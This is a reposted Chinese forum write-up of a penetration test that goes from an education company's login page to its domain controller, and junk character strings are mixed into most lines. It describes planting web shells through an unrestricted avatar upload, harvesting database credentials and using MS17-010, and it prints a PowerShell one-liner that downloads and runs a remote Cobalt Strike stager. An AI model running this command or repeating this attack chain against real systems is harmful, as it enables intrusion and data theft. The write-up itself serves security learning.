! R( G7 `% K; h! u* K; a 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
* H/ \2 v8 l) x ) V, F3 f n0 F& u& d- t
7 E) s! O( f$ G! h
: K! Q$ k o0 r1 V9 m 3 Y: [9 `( ~. R5 t
: u$ X$ {, x2 O B) R 正文
" r9 P' e4 o: \+ d& ]! I 9 {( G2 @: v1 Z4 g- g9 V) v, N
) I# X8 x2 t1 I/ l {
( c3 B% H" F* R& } ' h" P4 M; r! u: u( b v; F" n
$ W+ o1 V$ O4 ?3 N# @* I 目标:www.xxxx.com(一家教育机构)
- N, ]+ Z' \' [% d9 `! M1 T; M打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能' c: t. G0 P- J3 a4 f T; w
. Y" a# g: a; b
~2 p" F* }" o1 m, D4 u
4 p. z! V& U$ N4 o2 ^$ q9 [# ~ + @; l" b5 X3 F! p) S
+ z2 Y4 U; }. P 进行了简单的信息搜集
3 J6 ?4 k1 H9 a% t+ y
# c7 g& S5 S- K$ ~- {1 c/ M! F3 G( M
" i% X& i6 L' B. Y6 Y j5 x
$ C: V m& G8 R( P
7 Y- n5 _5 ^7 O* |1 O8 |+ ^# n 子域名搜集# t. Z4 j5 p% G
- ^, A* b! Q. d" U. Q" u
9 B- e+ d- z; {& ?9 R, p
& R, o+ H# ]2 Z: A; i$ G; Y 6 d1 o7 i) G% h4 H3 I+ ]
8 E# f) ?* H) ~' B- ^5 k
fofa找资产 9 i# F2 Q( d" }: G, T Y; n: }$ G
: L3 H* e2 O' O4 i4 g% c
4 `9 n6 O& W Q 8 `2 p( }! ~- K6 D$ @" b
2 C& a) s5 t9 m4 i: `+ ~ ! T1 K8 l5 U- |; q& C4 C
/ _; V, {7 L. ^ G/ m
: z8 |3 k+ s3 a& s8 g5 c 一共七个资产。去重之后只有两个。 1 y% @" |; |! `" k
5 m0 O$ n6 A# I0 y* d' m" S
, ? G2 O" q4 K
, f% }' R& T. \
5 W9 d. F) n% ~ 目录探测' d0 [! ?. `4 }
" Y! |. X( B4 K4 p: N: C% o/ L2 y j7 t
1 V) [( D' H; n5 j) y
" {. K! y- i3 j4 ?3 \8 V3 D8 e. c
. C& K% z9 H2 ? 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
! {' i- E4 P7 w) A# Y5 y 2 \* N% Z6 m0 Q: t' ~% I, S. P, R
. S7 }. P4 J/ i) _' R! c& c
: B6 r p5 M9 |, ]4 Y' F& M& s P- w4 M; @7 Q
我又尝试了通过修改返回包来绕过登录界面
9 C+ V" E. F% Y- F# V7 n
) N5 ^- M w6 v5 n5 n4 y# P, P0 ]3 t) F, W
9 ?3 l4 ~" m" a5 Y' F! N
! N$ j0 X. O& \* D7 Y) G" t! w# N* ^( n/ a5 k* o
还是不行,尝试注入无果- b: g5 u3 `/ x9 @( |. r
6 H6 ?1 [, k: d6 e
* i0 W. G4 P/ E0 W! i T' r; y
" t3 s) \1 I: B* p0 t) B # }. z Z! W4 s: ` n
9 Z" a3 n. R0 C: U* M 不过我目录探测出了一处Spring信息泄露
$ l. J+ z& V) b0 L7 R' m ; \) M6 H% z) L& g; j) d* Y- S
, u, W! p$ U2 m& t4 V. J
3 I. Y: o4 b# z0 z
/ w7 E) N2 ?! y# j* ~ + m7 D N5 s/ r
: v7 A+ h) a. [+ p
& K1 P1 v; c, a r8 v! {0 }: L3 u 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录3 y4 w( z- S0 G9 G; g
4 P5 @) i; m4 s
$ q/ P, u% b y% ~ $ x n# r3 N, }! x5 X+ u; e* A/ o% h
S6 U9 h9 [7 @2 W" L2 k, t# ` g& l! f" g6 I* }
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
( ~' W) D+ b: | ( q% ]* ^) g; F6 k9 n
6 }! i" j6 D, z# L* e7 J
+ D/ h! p M3 ?, w' n7 \
+ J: H* _0 e/ \% I l% K4 E' }6 _3 X
获取有些师傅到这一步就手机抓包电脑测了。' J# ]" I3 F( A
" I, |; K$ H: [( s2 \, `& K7 P3 s) C7 H8 U r" m* C( m; V/ h
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
* r# [9 A* P( @
' W5 W& F3 T" S8 ~/ z
, K2 ^" w6 s: q# c2 @ 其中在一个公众号发现了小程序,可以进行注册。* L; ]4 a2 M" i6 t9 ?# m
0 e# a* L$ q8 T6 y9 O' }/ ?
$ j3 [/ U; |2 q0 T 看到了头像上传,尝试上传获取WebShell
v3 X F6 i n& x5 \ % W: V6 ^3 |& ]9 M% D6 O8 O- z
+ y: h# T0 ?: J" w: N& `
$ |& J9 x( ^; S* y1 V ( A' m& c5 W1 H
( A% q0 N9 f0 |* h4 ?$ I" Q1 `
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问9 ^6 i5 S* l+ c& x3 E; x( i
2 n/ Z/ a8 }' A( o% G+ p) ?; t) `# o2 f; B
1 b7 D4 E% q7 R+ D" I
j+ ?% b/ B3 f: |* h
0 u/ X+ A2 E6 o$ C/ ^3 s! l d: E 然后上了大马- a3 F3 G: l6 _9 R
# Q7 T7 G; p* C U! G2 g6 ?$ i
b/ |; J. w% ~/ H
: C% ?: p" d. h* n( y
5 P( q2 R6 n) B8 u4 v8 H1 D: i/ c t& Y+ ?8 A- `! Q O1 Z
) E6 _1 W# ~; r; T% b. e$ g/ y
; r4 J, L/ b& X4 V6 J3 B
+ r i& @0 |6 `' b( v4 O9 w# u 通过翻找文件发现数据库账号密码2 E4 ]( O* K+ u
, J, ^ C& F* E
8 I, L/ V0 X% X+ R# p- Q
+ U: O" W. M% p, F; `* S" x' }
) i+ D+ f, J! h+ G M8 p
/ h+ [4 G. z* z2 P6 H9 Y --内网渗透3 [# l' c- v% @ e4 w) [
$ N5 _1 k) @; B4 A5 r( L2 o% g5 |
- ?2 L1 r. p0 {; b8 }( h 直接通过powershell执行 cs上线
8 v! u) S( ?! X8 e; P6 P
7 @: L2 ]9 Q$ ?% U5 N' X0 A7 Y; E; y# S3 k1 u0 I- b
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
: C( e9 l# N, b" D6 ^ , m6 a! V- V$ }& P+ g
- ?2 A: h1 T+ Z
4 J! R! T7 ~3 p1 k - m; M6 w Q, K6 u
* G4 I3 {. O* j+ Q2 u
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破) F2 s6 i' [ z$ X0 U. }
9 H5 O! J' w. R" a/ h
' F* R1 n ^5 ?0 _" u' H
6 ^" @) o; z2 A3 b
0 g$ F/ I- _! a3 r$ g" v; a b# u0 ?$ \3 a( o
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 6 P9 B7 x$ _6 \ B2 P& J
1 b) W% v! [ E8 ~. w+ a
( N0 `! h! y5 \) Q j+ Q; o
% r h8 @7 S7 b+ T + v: y4 b& X+ u5 j0 a8 p7 A+ U
& u" e" P5 g! Z# V) _& r
1 s& P8 [. b* O; x- ~: E
; C+ [1 J9 i1 y& i/ O
; c+ q% c: C( |- p* @2 Q 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
( `: I. I0 x- Z+ U. r A, [ ( k* V+ B/ A! m! X$ p
4 ]6 i# F) A7 v/ k 8 V4 D* F/ j* g. e
3 ^# W/ t3 |5 e- D
0 M' f1 N3 S% ~1 O " L, t/ E" Z' l
. u/ Z: t) V! K$ Z& Q' D4 O9 Z ; ] G! B9 Q3 p% q0 G' a! Z
0 z0 Y- a) J+ H2 D
% [/ [. C: V$ K, d6 ^* C& O3 a
6 a' \9 ~0 Y6 w/ p* D) k W; X( Z6 l/ S1 N/ P) t R: R- r' Y1 S
5 x; o, o6 l$ f/ }6 n
% J' ]8 C+ c" G$ X- E3 ^, g$ A5 m& d9 A+ K6 P$ t0 K9 x: v
小结
7 `6 k, C2 X# e+ f) ` - F3 j* W, g- z, Z6 S
. x8 Q! Z' \: o8 I5 _& G9 @1 \
, @4 X9 F- m; \9 N+ K3 j
& }2 z% r: H4 R/ i$ b1 T) x' o. B/ \/ Q& f8 l
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!% { l5 Q; U P# `9 @& _$ {7 s1 V9 y
) R4 V, C! Y/ ^7 g2 n# A1 p3 j) N
# y! f4 e. }9 S8 Q1 x$ |7 y2 w
' T+ U7 N7 m, ?
& h# A- q- w3 H2 C; ^9 N& [1 E4 f" Q9 x9 W( v! X a/ H [' y1 e
-
: }5 s ?. j9 ~! Q
G9 A- i( d2 w& K0 B, c) p7 T
" i- ^3 |/ Z3 X7 Y: \* G7 h
-
! h5 V: ~. ?! Z9 u" n
2 z' N2 u' X! I* ^
4 \. e; {. b& ]
' W" b |( d0 ]8 M9 F- L
2 m. e" D* f3 r) D. x/ G& g 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html0 O0 B6 e p: R! q k( T, \: w; n
4 F5 g% E% x( ~" ~' }
/ H. E" }# \; z! L
) S0 V0 F' m; A0 j" W& b6 p- d9 B |